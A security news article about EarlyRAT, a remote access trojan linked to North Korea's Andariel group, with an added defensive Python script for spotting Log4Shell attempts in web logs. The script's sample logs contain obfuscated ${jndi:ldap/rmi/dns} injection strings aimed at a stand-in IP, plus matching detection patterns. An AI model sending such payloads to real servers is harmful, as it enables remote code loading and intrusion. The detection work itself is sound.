‘EarlyRAT,’ a remote access trojan (RAT) used by Andariel, a subgroup of the Lazarus North Korean state-sponsored hacking group, has been discovered by security analysts.
Andariel (also known as Stonefly) is considered part of the Lazarus hacking group and is known for using the DTrack modular backdoor to collect information from compromised systems, such as browsing history, typed data (keylogging), screenshots, running processes, and more.
A more recent WithSecure report described a North Korean group, possibly Andariel, using a newer version of DTrack to collect valuable intellectual property over a two-month period.
Kaspersky has also linked Andariel to deployments of the Maui ransomware in Russia, India, and Southeast Asia, indicating that the threat group also pursues financial gain.
EarlyRAT is used by the hacking group to gather system data from the compromised devices and send it to the attacker’s C2 (command and control) server.
Kaspersky’s discovery adds another documented tool to the group’s known arsenal and helps defenders identify and block related intrusions.
Kaspersky came across EarlyRAT while investigating an Andariel campaign that began in mid-2022, in which the threat actors used Log4Shell to break into corporate networks.
After exploiting the Log4j vulnerability (Log4Shell, CVE-2021-44228), Andariel performed network reconnaissance, credential theft, and lateral movement using open-source tools including 3Proxy, PuTTY, Dumpert, and Powerline.
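Since Log4Shell was the initial access vector in this campaign, the first thing a defender would want is a way to spot exploitation attempts in web server logs. The following is an added example, not code from the Kaspersky or WithSecure reports: a small Python checker that normalizes URL encoding and the common lookup-based obfuscations (`${lower:j}`, `${::-j}`) before matching the `${jndi:...}` signature. The log lines and the IP addresses in them are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for illustration; none are from the
# Kaspersky or WithSecure reports. 203.0.113.10 is a documentation-range IP.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Jun/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Jun/2022:10:01:04 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jun/2022:10:01:07 +0000] "GET /api/login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [12/Jun/2022:10:01:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.10%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [12/Jun/2022:10:01:11 +0000] "GET /health HTTP/1.1" 200 2 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}" "-"',
]

# Lookup forms commonly used to hide the literal string "jndi":
#   ${lower:j} / ${upper:J}   -> j / J
#   ${::-j}, ${env:NOPE:-j}   -> j  (default value of an empty or missing lookup)
_CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.I)
_DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
# Signature checked after normalization; the JNDI protocol is captured.
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:', re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode twice (for double encoding) and peel nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        peeled = _DEFAULT_LOOKUP.sub(r'\1', _CASE_LOOKUP.sub(r'\1', text))
        if peeled == text:
            break
        text = peeled
    return text


def find_log4shell(lines):
    """Return (client_ip, protocol, normalized_snippet) for each matching line."""
    hits = []
    for line in lines:
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            client_ip = line.split(' ', 1)[0]
            snippet = normalized[match.start():match.start() + 80]
            hits.append((client_ip, match.group(1).lower(), snippet))
    return hits


if __name__ == '__main__':
    for ip, proto, snippet in find_log4shell(SAMPLE_LOGS):
        print(f'{ip}\tjndi:{proto}\t{snippet}')
```

Running it against the constructed sample flags the three probes from 10.0.0.9 (plain, URL-encoded, and `${::-x}`-obfuscated) and leaves the benign `${env:HOME}` query alone. A production version would also pull the request body and headers such as `X-Forwarded-For` into the text that is normalized, since Log4Shell payloads were delivered in any field the application logged.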
In these attacks, the researchers also found a phishing document whose macros retrieved an EarlyRAT payload from a site linked to earlier Maui ransomware campaigns.
EarlyRAT is a simple program that, once executed, immediately begins collecting system information and sends it to the C2 server via an HTTP POST request.
EarlyRAT’s second primary function is executing commands on the infected system, presumably to download additional payloads, exfiltrate valuable data, or disrupt system operations.
Kaspersky does not go into detail on that front, but it does note that EarlyRAT closely resembles MagicRAT, another Lazarus tool that creates scheduled tasks and downloads additional malware from the C2.
The researchers say the observed EarlyRAT activity appeared to be carried out by an inexperienced human operator, given the number of mistakes and typos.
Many of the commands executed on the breached network devices were typed manually rather than hardcoded, often leading to typo-induced errors.
Similar carelessness exposed a Lazarus campaign to WithSecure’s researchers last year, who observed a group operator fail to use a proxy at the start of their workday and reveal their North Korean IP address.